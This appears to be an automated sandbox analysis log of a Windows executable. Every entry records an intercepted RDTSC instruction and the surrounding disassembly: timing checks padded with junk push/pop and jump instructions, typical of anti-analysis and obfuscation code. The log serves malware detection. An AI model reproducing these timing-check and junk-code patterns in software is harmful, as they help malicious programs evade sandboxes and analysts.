Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 854B7D second address: 854B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7A2D39F16Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 854B8C second address: 854B91 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 854B91 second address: 854B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 854B97 second address: 854BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F7A2CC6ACF9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 854BB9 second address: 854BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 854BBD second address: 854BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jl 00007F7A2CC6ACE6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 854BD0 second address: 854C04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7A2D39F16Dh 0x0000000e jmp 00007F7A2D39F178h 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 854F15 second address: 854F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 854F1B second address: 854F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 856150 second address: 85615C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7A2CC6ACE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 85615C second address: 856175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7A2D39F174h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 853F86 second address: 853FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7A2CC6ACF0h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F7A2CC6ACF6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 853FB7 second address: 853FD5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7A2D39F179h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 85CA5A second address: 85CA60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 85C42B second address: 85C47A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F7A2D39F172h 0x0000000a jbe 00007F7A2D39F166h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7A2D39F170h 0x0000001a jnl 00007F7A2D39F17Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 85C47A second address: 85C496 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jbe 00007F7A2CC6ACE6h 0x0000000b jg 00007F7A2CC6ACE6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 jl 00007F7A2CC6ACECh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 85C777 second address: 85C794 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F7A2D39F172h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 869C18 second address: 869C23 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 869C23 second address: 869C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 869C29 second address: 869C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7A2CC6ACEAh 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 86FB39 second address: 86FB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F7A2D39F166h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 86FB47 second address: 86FB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 86F879 second address: 86F880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 86F880 second address: 86F885 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 87443D second address: 87445B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7A2D39F17Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 87445B second address: 874461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 874461 second address: 874465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 87BA20 second address: 87BA24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 88663C second address: 886641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 886641 second address: 886647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 885341 second address: 885345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 885345 second address: 885355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A2CC6ACEAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 885355 second address: 88535B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 88535B second address: 885361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 885361 second address: 885365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 885505 second address: 885509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8857C5 second address: 885810 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F16Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jng 00007F7A2D39F17Ch 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F7A2D39F174h 0x00000018 jmp 00007F7A2D39F178h 0x0000001d push ecx 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 886323 second address: 886343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 886343 second address: 886347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 886347 second address: 88634D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 889024 second address: 889038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jg 00007F7A2D39F16Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 889038 second address: 88904D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 88904D second address: 889051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 888D12 second address: 888D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 888D1B second address: 888D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7A2D39F166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 888D25 second address: 888D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 888D39 second address: 888D40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 888D40 second address: 888D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7A2CC6ACE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8938D0 second address: 8938D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8938D8 second address: 8938EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a jne 00007F7A2CC6ACE6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8968EA second address: 8968FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jp 00007F7A2D39F166h 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8968FB second address: 896901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8A8D4B second address: 8A8D78 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7A2D39F166h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F7A2D39F177h 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F7A2D39F166h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8C7397 second address: 8C73C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A2CC6ACEFh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7A2CC6ACF1h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8C73C0 second address: 8C73C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8C751A second address: 8C7532 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8C7FF7 second address: 8C801A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F173h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F7A2D39F166h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8C801A second address: 8C801E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8C9DCC second address: 8C9DEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7A2D39F177h 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8C9DEE second address: 8C9DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8CB447 second address: 8CB452 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7A2D39F166h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8CDDE4 second address: 8CDDEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8CDDEA second address: 8CDDEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8CDDEE second address: 8CDE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e pushad 0x0000000f jmp 00007F7A2CC6ACEEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8CE052 second address: 8CE058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8CE058 second address: 8CE05C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8CE103 second address: 8CE107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8CE107 second address: 8CE10D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8CF679 second address: 8CF687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F7A2D39F166h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8CF687 second address: 8CF68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8CF68C second address: 8CF696 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7A2D39F172h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8D1378 second address: 8D138A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F7A2CC6ACECh 0x0000000c ja 00007F7A2CC6ACE6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8D2E20 second address: 8D2E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 8D2E26 second address: 8D2E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7A2CC6ACE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F70DCF second address: 4F70E40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F16Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7A2D39F170h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F7A2D39F16Dh 0x0000001a xor si, 96A6h 0x0000001f jmp 00007F7A2D39F171h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F7A2D39F170h 0x0000002b sbb eax, 133D7C48h 0x00000031 jmp 00007F7A2D39F16Bh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60E47 second address: 4F60E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60E4D second address: 4F60E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60E51 second address: 4F60E79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7A2CC6ACF4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60E79 second address: 4F60E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A2D39F16Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60E8B second address: 4F60E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60E8F second address: 4F60EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7A2D39F179h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60EB5 second address: 4F60EBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60EBB second address: 4F60EF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 mov di, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F7A2D39F16Eh 0x00000015 add al, 00000008h 0x00000018 jmp 00007F7A2D39F16Bh 0x0000001d popfd 0x0000001e mov ecx, 51BDA87Fh 0x00000023 popad 0x00000024 pop ebp 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 pop edi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60EF4 second address: 4F60EF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA06B8 second address: 4FA06E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7A2D39F177h 0x00000009 jmp 00007F7A2D39F173h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA06E9 second address: 4FA06F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA06F7 second address: 4FA06FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA06FB second address: 4FA06FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA06FF second address: 4FA0705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA0705 second address: 4FA07CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7A2CC6ACF6h 0x00000009 adc esi, 7BE905C8h 0x0000000f jmp 00007F7A2CC6ACEBh 0x00000014 popfd 0x00000015 push esi 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F7A2CC6ACF5h 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 call 00007F7A2CC6ACECh 0x00000027 pushfd 0x00000028 jmp 00007F7A2CC6ACF2h 0x0000002d sub ecx, 587DBA88h 0x00000033 jmp 00007F7A2CC6ACEBh 0x00000038 popfd 0x00000039 pop esi 0x0000003a pushfd 0x0000003b jmp 00007F7A2CC6ACF9h 0x00000040 add esi, 5C4C81A6h 0x00000046 jmp 00007F7A2CC6ACF1h 0x0000004b popfd 0x0000004c popad 0x0000004d mov ebp, esp 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 call 00007F7A2CC6ACF6h 0x00000057 pop esi 0x00000058 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F4014F second address: 4F40155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
